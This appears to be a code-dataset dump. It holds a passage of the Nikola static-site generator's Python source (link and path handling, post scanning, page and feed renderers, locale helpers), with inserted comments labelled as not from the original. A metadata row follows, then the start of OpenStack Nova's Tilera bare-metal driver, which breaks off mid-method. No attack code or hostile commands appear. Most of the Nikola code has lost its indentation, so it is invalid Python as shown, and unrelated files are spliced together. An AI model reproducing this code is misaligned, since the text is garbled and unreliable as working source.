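    # Illustrative sketch, not part of the original Nikola source: assuming
    # URL_TYPE == 'rel_path', rewriting a destination '/images/logo.png'
    # referenced from src '/posts/foo/index.html' would yield
    # '../../images/logo.png'; a 'link://slug/foo' destination is first
    # resolved through self.link() before the same relativization applies.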
def path(self, kind, name, lang=None, is_link=False):
r"""Build the path to a certain kind of page.
These are mostly defined by plugins by registering via the
register_path_handler method, except for slug, post_path, root
and filename which are defined in this class' init method.
        Here are some of the others, for historical reasons:
* root (name is ignored)
* tag_index (name is ignored)
* tag (and name is the tag name)
* tag_rss (name is the tag name)
* category (and name is the category name)
* category_rss (and name is the category name)
* archive (and name is the year, or None for the main archive index)
* index (name is the number in index-number)
* rss (name is ignored)
* gallery (name is the gallery name)
* listing (name is the source code file name)
* post_path (name is 1st element in a POSTS/PAGES tuple)
* slug (name is the slug of a post or story)
* filename (name is the source filename of a post/story, in DEFAULT_LANG, relative to conf.py)
The returned value is always a path relative to output, like
"categories/whatever.html"
If is_link is True, the path is absolute and uses "/" as separator
(ex: "/archive/index.html").
If is_link is False, the path is relative to output and uses the
platform's separator.
(ex: "archive\index.html")
"""
if lang is None:
lang = utils.LocaleBorg().current_lang
try:
path = self.path_handlers[kind](name, lang)
path = [os.path.normpath(p) for p in path if p != '.'] # Fix Issue #1028
if is_link:
link = '/' + ('/'.join(path))
index_len = len(self.config['INDEX_FILE'])
if self.config['STRIP_INDEXES'] and \
link[-(1 + index_len):] == '/' + self.config['INDEX_FILE']:
return link[:-index_len]
else:
return link
else:
return os.path.join(*path)
except KeyError:
utils.LOGGER.warn("Unknown path request of kind: {0}".format(kind))
return ""
def post_path(self, name, lang):
"""Link to the destination of an element in the POSTS/PAGES settings.
Example:
link://post_path/posts => /blog
"""
return [_f for _f in [self.config['TRANSLATIONS'][lang],
os.path.dirname(name),
self.config['INDEX_FILE']] if _f]
def root_path(self, name, lang):
"""Link to the current language's root.
Example:
link://root_path => /
link://root_path => /translations/spanish/
"""
d = self.config['TRANSLATIONS'][lang]
if d:
return [d, '']
else:
return []
def slug_path(self, name, lang):
"""A link to a post with given slug, if not ambiguous.
Example:
        link://slug/yellow-camaro => /posts/cars/awful/yellow-camaro/index.html
"""
results = [p for p in self.timeline if p.meta('slug') == name]
if not results:
utils.LOGGER.warning("Cannot resolve path request for slug: {0}".format(name))
else:
if len(results) > 1:
utils.LOGGER.warning('Ambiguous path request for slug: {0}'.format(name))
return [_f for _f in results[0].permalink(lang).split('/') if _f]
def filename_path(self, name, lang):
"""Link to post or story by source filename.
Example:
link://filename/manual.txt => /docs/handbook.html
"""
results = [p for p in self.timeline if p.source_path == name]
if not results:
utils.LOGGER.warning("Cannot resolve path request for filename: {0}".format(name))
else:
if len(results) > 1:
utils.LOGGER.error("Ambiguous path request for filename: {0}".format(name))
return [_f for _f in results[0].permalink(lang).split('/') if _f]
def register_path_handler(self, kind, f):
"""Register a path handler."""
if kind in self.path_handlers:
utils.LOGGER.warning('Conflicting path handlers for kind: {0}'.format(kind))
else:
self.path_handlers[kind] = f
def link(self, *args):
"""Create a link."""
url = self.path(*args, is_link=True)
url = utils.encodelink(url)
return url
def abs_link(self, dst, protocol_relative=False):
"""Get an absolute link."""
# Normalize
if dst: # Mako templates and empty strings evaluate to False
dst = urljoin(self.config['BASE_URL'], dst.lstrip('/'))
else:
dst = self.config['BASE_URL']
url = urlparse(dst).geturl()
if protocol_relative:
url = url.split(":", 1)[1]
url = utils.encodelink(url)
return url
def rel_link(self, src, dst):
"""Get a relative link."""
# Normalize
src = urljoin(self.config['BASE_URL'], src)
dst = urljoin(src, dst)
# Avoid empty links.
if src == dst:
return "#"
# Check that link can be made relative, otherwise return dest
parsed_src = urlsplit(src)
parsed_dst = urlsplit(dst)
if parsed_src[:2] != parsed_dst[:2]:
return utils.encodelink(dst)
# Now both paths are on the same site and absolute
src_elems = parsed_src.path.split('/')[1:]
dst_elems = parsed_dst.path.split('/')[1:]
i = 0
for (i, s), d in zip(enumerate(src_elems), dst_elems):
if s != d:
break
else:
i += 1
# Now i is the longest common prefix
url = '/'.join(['..'] * (len(src_elems) - i - 1) + dst_elems[i:])
url = utils.encodelink(url)
return url
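    # Illustrative sketch, not part of the original Nikola source: assuming
    # BASE_URL points at the site root,
    #     self.rel_link('/posts/foo/index.html', '/assets/css/all.css')
    # would return '../../assets/css/all.css', whereas a destination on a
    # different scheme or host is returned as-is (only percent-encoded).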
def file_exists(self, path, not_empty=False):
"""Check if the file exists. If not_empty is True, it also must not be empty."""
exists = os.path.exists(path)
if exists and not_empty:
exists = os.stat(path).st_size > 0
return exists
def clean_task_paths(self, task):
"""Normalize target paths in the task."""
targets = task.get('targets', None)
if targets is not None:
task['targets'] = [os.path.normpath(t) for t in targets]
return task
def gen_tasks(self, name, plugin_category, doc=''):
"""Generate tasks."""
def flatten(task):
"""Flatten lists of tasks."""
if isinstance(task, dict):
yield task
else:
for t in task:
for ft in flatten(t):
yield ft
task_dep = []
for pluginInfo in self.plugin_manager.getPluginsOfCategory(plugin_category):
for task in flatten(pluginInfo.plugin_object.gen_tasks()):
assert 'basename' in task
task = self.clean_task_paths(task)
if 'task_dep' not in task:
task['task_dep'] = []
task['task_dep'].extend(self.injected_deps[task['basename']])
yield task
for multi in self.plugin_manager.getPluginsOfCategory("TaskMultiplier"):
flag = False
for task in multi.plugin_object.process(task, name):
flag = True
yield self.clean_task_paths(task)
if flag:
task_dep.append('{0}_{1}'.format(name, multi.plugin_object.name))
if pluginInfo.plugin_object.is_default:
task_dep.append(pluginInfo.plugin_object.name)
yield {
'basename': name,
'doc': doc,
'actions': None,
'clean': True,
'task_dep': task_dep
}
def parse_category_name(self, category_name):
"""Parse a category name into a hierarchy."""
if self.config['CATEGORY_ALLOW_HIERARCHIES']:
try:
return utils.parse_escaped_hierarchical_category_name(category_name)
except Exception as e:
utils.LOGGER.error(str(e))
sys.exit(1)
else:
return [category_name] if len(category_name) > 0 else []
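    # Illustrative sketch, not part of the original Nikola source: with
    # CATEGORY_ALLOW_HIERARCHIES enabled, a name such as 'cars/sports' would
    # be parsed into ['cars', 'sports']; with hierarchies disabled the whole
    # string is kept as one flat category, i.e. ['cars/sports'].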
def category_path_to_category_name(self, category_path):
"""Translate a category path to a category name."""
if self.config['CATEGORY_ALLOW_HIERARCHIES']:
return utils.join_hierarchical_category_path(category_path)
else:
return ''.join(category_path)
def _add_post_to_category(self, post, category_name):
"""Add a post to a category."""
category_path = self.parse_category_name(category_name)
current_path = []
current_subtree = self.category_hierarchy
for current in category_path:
current_path.append(current)
if current not in current_subtree:
current_subtree[current] = {}
current_subtree = current_subtree[current]
self.posts_per_category[self.category_path_to_category_name(current_path)].append(post)
def _sort_category_hierarchy(self):
"""Sort category hierarchy."""
# First create a hierarchy of TreeNodes
self.category_hierarchy_lookup = {}
def create_hierarchy(cat_hierarchy, parent=None):
"""Create category hierarchy."""
result = []
for name, children in cat_hierarchy.items():
node = utils.TreeNode(name, parent)
node.children = create_hierarchy(children, node)
node.category_path = [pn.name for pn in node.get_path()]
node.category_name = self.category_path_to_category_name(node.category_path)
self.category_hierarchy_lookup[node.category_name] = node
if node.category_name not in self.config.get('HIDDEN_CATEGORIES'):
result.append(node)
return natsort.natsorted(result, key=lambda e: e.name, alg=natsort.ns.F | natsort.ns.IC)
root_list = create_hierarchy(self.category_hierarchy)
# Next, flatten the hierarchy
self.category_hierarchy = utils.flatten_tree_structure(root_list)
def scan_posts(self, really=False, ignore_quit=False, quiet=False):
"""Scan all the posts.
The `quiet` option is ignored.
"""
if self._scanned and not really:
return
# Reset things
self.posts = []
self.all_posts = []
self.posts_per_year = defaultdict(list)
self.posts_per_month = defaultdict(list)
self.posts_per_tag = defaultdict(list)
self.posts_per_category = defaultdict(list)
self.tags_per_language = defaultdict(list)
self.category_hierarchy = {}
self.post_per_file = {}
self.timeline = []
self.pages = []
for p in self.plugin_manager.getPluginsOfCategory('PostScanner'):
timeline = p.plugin_object.scan()
# FIXME: can there be conflicts here?
self.timeline.extend(timeline)
quit = False
# Classify posts per year/tag/month/whatever
slugged_tags = set([])
for post in self.timeline:
if post.use_in_feeds:
self.posts.append(post)
self.posts_per_year[str(post.date.year)].append(post)
self.posts_per_month[
'{0}/{1:02d}'.format(post.date.year, post.date.month)].append(post)
for tag in post.alltags:
_tag_slugified = utils.slugify(tag)
if _tag_slugified in slugged_tags:
if tag not in self.posts_per_tag:
# Tags that differ only in case
other_tag = [existing for existing in self.posts_per_tag.keys() if utils.slugify(existing) == _tag_slugified][0]
utils.LOGGER.error('You have tags that are too similar: {0} and {1}'.format(tag, other_tag))
utils.LOGGER.error('Tag {0} is used in: {1}'.format(tag, post.source_path))
utils.LOGGER.error('Tag {0} is used in: {1}'.format(other_tag, ', '.join([p.source_path for p in self.posts_per_tag[other_tag]])))
quit = True
else:
slugged_tags.add(utils.slugify(tag))
self.posts_per_tag[tag].append(post)
for lang in self.config['TRANSLATIONS'].keys():
self.tags_per_language[lang].extend(post.tags_for_language(lang))
self._add_post_to_category(post, post.meta('category'))
if post.is_post:
# unpublished posts
self.all_posts.append(post)
else:
self.pages.append(post)
for lang in self.config['TRANSLATIONS'].keys():
dest = post.destination_path(lang=lang)
src_dest = post.destination_path(lang=lang, extension=post.source_ext())
if dest in self.post_per_file:
utils.LOGGER.error('Two posts are trying to generate {0}: {1} and {2}'.format(
dest,
self.post_per_file[dest].source_path,
post.source_path))
quit = True
if (src_dest in self.post_per_file) and self.config['COPY_SOURCES']:
utils.LOGGER.error('Two posts are trying to generate {0}: {1} and {2}'.format(
src_dest,
self.post_per_file[dest].source_path,
post.source_path))
quit = True
self.post_per_file[dest] = post
self.post_per_file[src_dest] = post
# deduplicate tags_per_language
self.tags_per_language[lang] = list(set(self.tags_per_language[lang]))
# Sort everything.
for thing in self.timeline, self.posts, self.all_posts, self.pages:
thing.sort(key=lambda p: (p.date, p.source_path))
thing.reverse()
self._sort_category_hierarchy()
for i, p in enumerate(self.posts[1:]):
p.next_post = self.posts[i]
for i, p in enumerate(self.posts[:-1]):
p.prev_post = self.posts[i + 1]
self._scanned = True
if not self.quiet:
print("done!", file=sys.stderr)
if quit and not ignore_quit:
sys.exit(1)
signal('scanned').send(self)
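    # Illustrative note, not part of the original Nikola source: once
    # scan_posts() completes, self.timeline holds every post and page, the
    # per-year/month/tag/category dictionaries are populated, and path
    # handlers such as slug_path/filename_path can resolve links against it.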
def generic_page_renderer(self, lang, post, filters, context=None):
"""Render post fragments to final HTML pages."""
utils.LocaleBorg().set_locale(lang)
context = context.copy() if context else {}
deps = post.deps(lang) + \
self.template_system.template_deps(post.template_name)
deps.extend(utils.get_asset_path(x, self.THEMES) for x in ('bundles', 'parent', 'engine'))
deps = list(filter(None, deps))
context['post'] = post
context['lang'] = lang
context['title'] = post.title(lang)
context['description'] = post.description(lang)
context['permalink'] = post.permalink(lang)
if 'pagekind' not in context:
context['pagekind'] = ['generic_page']
if post.use_in_feeds:
context['enable_comments'] = True
else:
context['enable_comments'] = self.config['COMMENTS_IN_STORIES']
extension = self.get_compiler(post.source_path).extension()
output_name = os.path.join(self.config['OUTPUT_FOLDER'],
post.destination_path(lang, extension))
deps_dict = copy(context)
deps_dict.pop('post')
if post.prev_post:
deps_dict['PREV_LINK'] = [post.prev_post.permalink(lang)]
if post.next_post:
deps_dict['NEXT_LINK'] = [post.next_post.permalink(lang)]
deps_dict['OUTPUT_FOLDER'] = self.config['OUTPUT_FOLDER']
deps_dict['TRANSLATIONS'] = self.config['TRANSLATIONS']
deps_dict['global'] = self.GLOBAL_CONTEXT
deps_dict['comments'] = context['enable_comments']
for k, v in self.GLOBAL_CONTEXT['template_hooks'].items():
deps_dict['||template_hooks|{0}||'.format(k)] = v._items
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
deps_dict[k] = deps_dict['global'][k](lang)
deps_dict['navigation_links'] = deps_dict['global']['navigation_links'](lang)
if post:
deps_dict['post_translations'] = post.translated_to
task = {
'name': os.path.normpath(output_name),
'file_dep': sorted(deps),
'targets': [output_name],
'actions': [(self.render_template, [post.template_name,
output_name, context])],
'clean': True,
'uptodate': [config_changed(deps_dict, 'nikola.nikola.Nikola.generic_page_renderer')] + post.deps_uptodate(lang),
}
yield utils.apply_filters(task, filters)
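    # Illustrative note, not part of the original Nikola source: the yielded
    # dict is a doit task -- 'file_dep' drives rebuild detection, 'actions'
    # invokes render_template, and 'uptodate' includes config_changed() so the
    # page is regenerated whenever the relevant configuration changes.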
def generic_post_list_renderer(self, lang, posts, output_name,
template_name, filters, extra_context):
"""Render pages with lists of posts."""
deps = []
deps += self.template_system.template_deps(template_name)
uptodate_deps = []
for post in posts:
deps += post.deps(lang)
uptodate_deps += post.deps_uptodate(lang)
context = {}
context["posts"] = posts
context["title"] = self.config['BLOG_TITLE'](lang)
context["description"] = self.config['BLOG_DESCRIPTION'](lang)
context["lang"] = lang
context["prevlink"] = None
context["nextlink"] = None
context.update(extra_context)
deps_context = copy(context)
deps_context["posts"] = [(p.meta[lang]['title'], p.permalink(lang)) for p in
posts]
deps_context["global"] = self.GLOBAL_CONTEXT
for k, v in self.GLOBAL_CONTEXT['template_hooks'].items():
deps_context['||template_hooks|{0}||'.format(k)] = v._items
for k in self._GLOBAL_CONTEXT_TRANSLATABLE:
deps_context[k] = deps_context['global'][k](lang)
deps_context['navigation_links'] = deps_context['global']['navigation_links'](lang)
task = {
'name': os.path.normpath(output_name),
'targets': [output_name],
'file_dep': sorted(deps),
'actions': [(self.render_template, [template_name, output_name,
context])],
'clean': True,
'uptodate': [config_changed(deps_context, 'nikola.nikola.Nikola.generic_post_list_renderer')] + uptodate_deps
}
return utils.apply_filters(task, filters)
def generic_index_renderer(self, lang, posts, indexes_title, template_name, context_source, kw, basename, page_link, page_path, additional_dependencies=[]):
"""Create an index page.
lang: The language
posts: A list of posts
indexes_title: Title
template_name: Name of template file
context_source: This will be copied and extended and used as every
page's context
kw: An extended version will be used for uptodate dependencies
basename: Basename for task
page_link: A function accepting an index i, the displayed page number,
the number of pages, and a boolean force_addition
which creates a link to the i-th page (where i ranges
between 0 and num_pages-1). The displayed page (between 1
and num_pages) is the number (optionally) displayed as
'page %d' on the rendered page. If force_addition is True,
                    the suffix (inserting '-%d' etc.) should also be added for
i == 0.
page_path: A function accepting an index i, the displayed page number,
the number of pages, and a boolean force_addition,
which creates a path to the i-th page. All arguments are
as the ones for page_link.
additional_dependencies: a list of dependencies which will be added
to task['uptodate']
"""
# Update kw
kw = kw.copy()
kw["tag_pages_are_indexes"] = self.config['TAG_PAGES_ARE_INDEXES']
kw["index_display_post_count"] = self.config['INDEX_DISPLAY_POST_COUNT']
kw["index_teasers"] = self.config['INDEX_TEASERS']
kw["indexes_pages"] = self.config['INDEXES_PAGES'](lang)
kw["indexes_pages_main"] = self.config['INDEXES_PAGES_MAIN']
kw["indexes_static"] = self.config['INDEXES_STATIC']
kw['indexes_prety_page_url'] = self.config["INDEXES_PRETTY_PAGE_URL"]
kw['demote_headers'] = self.config['DEMOTE_HEADERS']
kw['generate_atom'] = self.config["GENERATE_ATOM"]
kw['generate_rss'] = self.config["GENERATE_RSS"]
kw['feed_link_append_query'] = self.config["FEED_LINKS_APPEND_QUERY"]
kw['currentfeed'] = None
kw['feed_enclosure'] = self.config['FEED_ENCLOSURE']
kw['feed_previewimage_default'] = self.config['FEED_PREVIEWIMAGE_DEFAULT']
kw['feed_push'] = self.config['FEED_PUSH']
kw['blog_description'] = self.config['BLOG_DESCRIPTION']
kw['site_url'] = self.config['SITE_URL']
kw['base_url'] = self.config['BASE_URL']
# Split in smaller lists
lists = []
if kw["indexes_static"]:
lists.append(posts[:kw["index_display_post_count"]])
posts = posts[kw["index_display_post_count"]:]
while posts:
lists.append(posts[-kw["index_display_post_count"]:])
posts = posts[:-kw["index_display_post_count"]]
else:
while posts:
lists.append(posts[:kw["index_display_post_count"]])
posts = posts[kw["index_display_post_count"]:]
num_pages = len(lists)
if kw['generate_atom'] or kw['generate_rss']:
description = context_source.get('description', None)
if description is None:
description = kw['blog_description'](lang)
atom_currentlink = None
atom_archprev = None
atom_archnext = None
rss_currentlink = None
rss_archprev = None
rss_archnext = None
pagekind = context_source.get('pagekind')
if pagekind and 'archive_page' in pagekind:
archivefeed = context_source.get('archivefeed')
if kw['generate_atom']:
atom_currentlink = self.link("atom", None, lang)
if archivefeed:
atom_archprev = archivefeed[0]
atom_archnext = archivefeed[1]
if kw['generate_rss']:
rss_currentlink = self.link("rss", None, lang)
if archivefeed:
rss_archprev = archivefeed[2]
rss_archnext = archivefeed[3]
atom_firstlink = None
atom_lastlink = None
rss_firstlink = None
rss_lastlink = None
if num_pages > 1:
if kw['indexes_static']:
first = 1
last = 0
else:
first = num_pages - 1
last = 0
firstpages_i = utils.get_displayed_page_number(first, num_pages,
self)
lastpages_i = utils.get_displayed_page_number(last, num_pages,
self)
if kw['generate_atom']:
atom_firstlink = page_link(first, firstpages_i, num_pages,
False, extension=".atom")
atom_lastlink = page_link(last, lastpages_i, num_pages,
False, extension=".atom")
if kw['generate_rss']:
rss_firstlink = page_link(first, firstpages_i, num_pages,
False, extension=".xml")
rss_lastlink = page_link(last, lastpages_i, num_pages,
False, extension=".xml")
for i, post_list in enumerate(lists):
context = context_source.copy()
if 'pagekind' not in context:
context['pagekind'] = ['index']
ipages_i = utils.get_displayed_page_number(i, num_pages, self)
if kw["indexes_pages"]:
indexes_pages = kw["indexes_pages"] % ipages_i
else:
if kw["indexes_pages_main"]:
ipages_msg = "page %d"
else:
ipages_msg = "old posts, page %d"
indexes_pages = " (" + \
kw["messages"][lang][ipages_msg] % ipages_i + ")"
if i > 0 or kw["indexes_pages_main"]:
context["title"] = indexes_title + indexes_pages
else:
context["title"] = indexes_title
context["prevlink"] = None
context["nextlink"] = None
context['index_teasers'] = kw['index_teasers']
prevlink = None
nextlink = None
if kw["indexes_static"]:
if i > 0:
if i < num_pages - 1:
prevlink = i + 1
elif i == num_pages - 1:
prevlink = 0
if num_pages > 1:
if i > 1:
nextlink = i - 1
elif i == 0:
nextlink = num_pages - 1
else:
if i > 0:
prevlink = i - 1
if i < num_pages - 1:
nextlink = i + 1
if prevlink is not None:
# the opposite direction...
context["prevlink"] = page_link(prevlink,
utils.get_displayed_page_number(prevlink, num_pages, self),
num_pages, False)
if nextlink is not None:
# the opposite direction...
context["nextlink"] = page_link(nextlink,
utils.get_displayed_page_number(nextlink, num_pages, self),
num_pages, False)
context["permalink"] = page_link(i, ipages_i, num_pages, False)
output_name = os.path.join(kw['output_folder'], page_path(i, ipages_i, num_pages, False))
task = self.generic_post_list_renderer(
lang,
post_list,
output_name,
template_name,
kw['filters'],
context,
)
task['uptodate'] = task['uptodate'] + [utils.config_changed(kw, 'nikola.nikola.Nikola.generic_index_renderer')] + additional_dependencies
task['basename'] = basename
yield task
if kw['generate_atom'] or kw['generate_rss']:
targets = []
atom_path = None
atom_output_name = None
atom_prevlink = None
atom_nextlink = None
if kw['generate_atom']:
atom_path = page_link(i, ipages_i, num_pages, False,
extension=".atom")
atom_output_name = os.path.join(kw['output_folder'],
atom_path.lstrip('/'))
targets.append(atom_output_name)
if nextlink is not None:
atom_prevlink = page_link(
nextlink,
utils.get_displayed_page_number(nextlink, num_pages,
self),
num_pages, False, extension=".atom")
elif atom_currentlink and atom_archprev:
atom_prevlink = atom_archprev
if prevlink is not None:
atom_nextlink = page_link(
prevlink,
utils.get_displayed_page_number(prevlink, num_pages,
self),
num_pages, False, extension=".atom")
elif atom_currentlink and atom_archnext:
atom_nextlink = atom_archnext
rss_path = None
rss_output_name = None
rss_prevlink = None
rss_nextlink = None
if kw['generate_rss']:
rss_path = page_link(i, ipages_i, num_pages, False,
extension=".xml")
rss_output_name = os.path.join(kw['output_folder'],
rss_path.lstrip('/'))
targets.append(rss_output_name)
if nextlink is not None:
rss_prevlink = page_link(
nextlink,
utils.get_displayed_page_number(nextlink, num_pages,
self),
num_pages, False, extension=".xml")
elif rss_currentlink and rss_archprev:
rss_prevlink = rss_archprev
if prevlink is not None:
rss_nextlink = page_link(
prevlink,
utils.get_displayed_page_number(prevlink, num_pages,
self),
num_pages, False, extension=".xml")
elif rss_currentlink and rss_archnext:
rss_nextlink = rss_archnext
feed_task = {
'basename': basename,
'name': lang + ':' + ':'.join(targets),
'actions': [(self.feedutil.gen_feed_generator,
(lang, post_list, urljoin(
kw['base_url'],
context["permalink"].lstrip('/')),
indexes_title, description,
atom_output_name, atom_path,
rss_output_name, rss_path,
atom_nextlink, atom_prevlink,
atom_firstlink, atom_lastlink,
rss_nextlink, rss_prevlink,
rss_firstlink, rss_lastlink,
atom_currentlink, rss_currentlink))],
'targets': targets,
'file_dep': [output_name],
'clean': True,
'uptodate': [utils.config_changed(kw, 'nikola.nikola.Nikola.gen_feed_generator')] + additional_dependencies
}
yield feed_task
if kw["indexes_pages_main"] and kw['indexes_prety_page_url'](lang):
# create redirection
output_name = os.path.join(kw['output_folder'], page_path(0, utils.get_displayed_page_number(0, num_pages, self), num_pages, True))
link = page_link(0, utils.get_displayed_page_number(0, num_pages, self), num_pages, False)
yield utils.apply_filters({
'basename': basename,
'name': output_name,
'targets': [output_name],
'actions': [(utils.create_redirect, (output_name, link))],
'clean': True,
'uptodate': [utils.config_changed(kw, 'nikola.nikola.Nikola.generic_index_renderer')],
}, kw["filters"])
def __repr__(self):
"""Representation of a Nikola site."""
return '<Nikola Site: {0!r}>'.format(self.config['BLOG_TITLE']())
def sanitized_locales(locale_fallback, locale_default, locales, translations):
"""Sanitize all locales availble in Nikola.
There will be one locale for each language in translations.
Locales for languages not in translations are ignored.
An explicit locale for a language can be specified in locales[language].
    Locales at the input must be in the string style (like 'en', 'en.utf8'), and
    the string can be unicode or bytes; at the output they will be of type str, as
    required by locale.setlocale.
    Explicit but invalid locales are replaced with the sanitized locale_fallback.
    Languages with no explicit locale are set to the sanitized locale_default if it
    was explicitly set, or to sanitized guesses compatible with v 6.0.4 if
    locale_default was None.
NOTE: never use locale.getlocale() , it can return values that
locale.setlocale will not accept in Windows XP, 7 and pythons 2.6, 2.7, 3.3
Examples: "Spanish", "French" can't do the full circle set / get / set
"""
if sys.platform != 'win32':
workaround_empty_LC_ALL_posix()
# locales for languages not in translations are ignored
extras = set(locales) - set(translations)
if extras:
msg = 'Unexpected languages in LOCALES, ignoring them: {0}'
utils.LOGGER.warn(msg.format(', '.join(extras)))
for lang in extras:
del locales[lang]
# py2x: get/setlocale related functions require the locale string as a str
# so convert
locale_fallback = str(locale_fallback) if locale_fallback else None
locale_default = str(locale_default) if locale_default else None
for lang in locales:
locales[lang] = str(locales[lang])
locale_fallback = valid_locale_fallback(locale_fallback)
# explicit but invalid locales are replaced with the sanitized locale_fallback
for lang in locales:
if not is_valid_locale(locales[lang]):
msg = 'Locale {0} for language {1} not accepted by python locale.'
utils.LOGGER.warn(msg.format(locales[lang], lang))
locales[lang] = locale_fallback
# languages with no explicit locale
missing = set(translations) - set(locales)
if locale_default:
# are set to the sanitized locale_default if it was explicitly set
if not is_valid_locale(locale_default):
msg = 'LOCALE_DEFAULT {0} could not be set, using {1}'
utils.LOGGER.warn(msg.format(locale_default, locale_fallback))
locale_default = locale_fallback
for lang in missing:
locales[lang] = locale_default
else:
# are set to sanitized guesses compatible with v 6.0.4 in Linux-Mac (was broken in Windows)
        if sys.platform == 'win32':
            guess_locale_from_lang = guess_locale_from_lang_windows
        else:
            guess_locale_from_lang = guess_locale_from_lang_posix
        for lang in missing:
            locale_n = guess_locale_from_lang(lang)
if not locale_n:
locale_n = locale_fallback
msg = "Could not guess locale for language {0}, using locale {1}"
utils.LOGGER.warn(msg.format(lang, locale_n))
locales[lang] = locale_n
return locale_fallback, locale_default, locales
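# Illustrative sketch, not part of the original Nikola source: a call such as
#     sanitized_locales('en_US.UTF-8', None, {'es': 'xx_invalid'}, ['en', 'es'])
# would replace the invalid 'xx_invalid' with the sanitized fallback and guess
# a locale for 'en', so every language in translations ends up with a usable
# str locale accepted by locale.setlocale.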
def is_valid_locale(locale_n):
"""Check if locale (type str) is valid."""
try:
locale.setlocale(locale.LC_ALL, locale_n)
return True
except locale.Error:
return False
def valid_locale_fallback(desired_locale=None):
"""Provide a default fallback_locale, a string that locale.setlocale will accept.
    If desired_locale is provided, it must be of type str for py2x compatibility
"""
# Whenever fallbacks change, adjust test TestHarcodedFallbacksWork
candidates_windows = [str('English'), str('C')]
candidates_posix = [str('en_US.UTF-8'), str('C')]
candidates = candidates_windows if sys.platform == 'win32' else candidates_posix
if desired_locale:
candidates = list(candidates)
candidates.insert(0, desired_locale)
found_valid = False
for locale_n in candidates:
found_valid = is_valid_locale(locale_n)
if found_valid:
break
if not found_valid:
msg = 'Could not find a valid fallback locale, tried: {0}'
utils.LOGGER.warn(msg.format(candidates))
elif desired_locale and (desired_locale != locale_n):
msg = 'Desired fallback locale {0} could not be set, using: {1}'
utils.LOGGER.warn(msg.format(desired_locale, locale_n))
return locale_n
def guess_locale_from_lang_windows(lang):
"""Guess a locale, basing on Windows language."""
locale_n = str(LEGAL_VALUES['_WINDOWS_LOCALE_GUESSES'].get(lang, None))
if not is_valid_locale(locale_n):
locale_n = None
return locale_n
def guess_locale_from_lang_posix(lang):
"""Guess a locale, basing on POSIX system language."""
# compatibility v6.0.4
if is_valid_locale(str(lang)):
locale_n = str(lang)
else:
# this works in Travis when locale support set by Travis suggestion
locale_n = str((locale.normalize(lang).split('.')[0]) + '.UTF-8')
if not is_valid_locale(locale_n):
# http://thread.gmane.org/gmane.comp.web.nikola/337/focus=343
locale_n = str((locale.normalize(lang).split('.')[0]))
if not is_valid_locale(locale_n):
locale_n = None
return locale_n
def workaround_empty_LC_ALL_posix():
# clunky hack: we have seen some posix locales with all or most of LC_*
# defined to the same value, but with LC_ALL empty.
# Manually doing what we do here seems to work for nikola in that case.
# It is unknown if it will work when the LC_* aren't homogeneous
try:
lc_time = os.environ.get('LC_TIME', None)
lc_all = os.environ.get('LC_ALL', None)
if lc_time and not lc_all:
os.environ['LC_ALL'] = lc_time
except Exception:
pass
| mit | 7,813,781,816,376,014,000 | 43.03318 | 196 | 0.547451 | false |
psiwczak/openstack | nova/virt/baremetal/tilera.py | 1 | 12639 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 University of Southern California
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tilera back-end for bare-metal compute node provisioning
The details of this implementation are specific to ISI's testbed. This code
is provided here as an example of how to implement a backend.
"""
import base64
import os
import subprocess
import time
from nova.compute import power_state
from nova.openstack.common import cfg
from nova import exception
from nova import flags
from nova import log as logging
from nova import utils
FLAGS = flags.FLAGS
tilera_opts = [
cfg.StrOpt('tile_monitor',
default='/usr/local/TileraMDE/bin/tile-monitor',
help='Tilera command line program for Bare-metal driver')
]
FLAGS.register_opts(tilera_opts)
LOG = logging.getLogger(__name__)
def get_baremetal_nodes():
return BareMetalNodes()
class BareMetalNodes(object):
"""
    This manages node information and implements the singleton pattern.
    The BareMetalNodes class handles machine architectures of interest to
    technical computing users, which have either poor or non-existent support
    for virtualization.
"""
_instance = None
_is_init = False
def __new__(cls, *args, **kwargs):
"""
Returns the BareMetalNodes singleton.
"""
if not cls._instance or ('new' in kwargs and kwargs['new']):
cls._instance = super(BareMetalNodes, cls).__new__(cls)
return cls._instance
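    # Illustrative note, not part of the original Nova source: because of the
    # singleton above, BareMetalNodes() is BareMetalNodes() normally holds;
    # passing new=True forces a fresh instance, which tests can rely on.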
def __init__(self, file_name="/tftpboot/tilera_boards"):
"""
Only call __init__ the first time object is instantiated.
From the bare-metal node list file: /tftpboot/tilera_boards,
reads each item of each node such as node ID, IP address,
MAC address, vcpus, memory, hdd, hypervisor type/version, and cpu
and appends each node information into nodes list.
"""
if self._is_init:
return
self._is_init = True
self.nodes = []
self.BOARD_ID = 0
self.IP_ADDR = 1
self.MAC_ADDR = 2
self.VCPUS = 3
self.MEMORY_MB = 4
self.LOCAL_GB = 5
self.MEMORY_MB_USED = 6
self.LOCAL_GB_USED = 7
self.HYPERVISOR_TYPE = 8
self.HYPERVISOR_VER = 9
self.CPU_INFO = 10
fp = open(file_name, "r")
for item in fp:
l = item.split()
if l[0] == '#':
continue
l_d = {'node_id': int(l[self.BOARD_ID]),
'ip_addr': l[self.IP_ADDR],
'mac_addr': l[self.MAC_ADDR],
'status': power_state.NOSTATE,
'vcpus': int(l[self.VCPUS]),
'memory_mb': int(l[self.MEMORY_MB]),
'local_gb': int(l[self.LOCAL_GB]),
'memory_mb_used': int(l[self.MEMORY_MB_USED]),
'local_gb_used': int(l[self.LOCAL_GB_USED]),
'hypervisor_type': l[self.HYPERVISOR_TYPE],
'hypervisor_version': int(l[self.HYPERVISOR_VER]),
'cpu_info': l[self.CPU_INFO]}
self.nodes.append(l_d)
fp.close()
def get_hw_info(self, field):
"""
Returns hardware information of bare-metal node by the given field.
Given field can be vcpus, memory_mb, local_gb, memory_mb_used,
local_gb_used, hypervisor_type, hypervisor_version, and cpu_info.
"""
for node in self.nodes:
if node['node_id'] == 9:
if field == 'vcpus':
return node['vcpus']
elif field == 'memory_mb':
return node['memory_mb']
elif field == 'local_gb':
return node['local_gb']
elif field == 'memory_mb_used':
return node['memory_mb_used']
elif field == 'local_gb_used':
return node['local_gb_used']
elif field == 'hypervisor_type':
return node['hypervisor_type']
elif field == 'hypervisor_version':
return node['hypervisor_version']
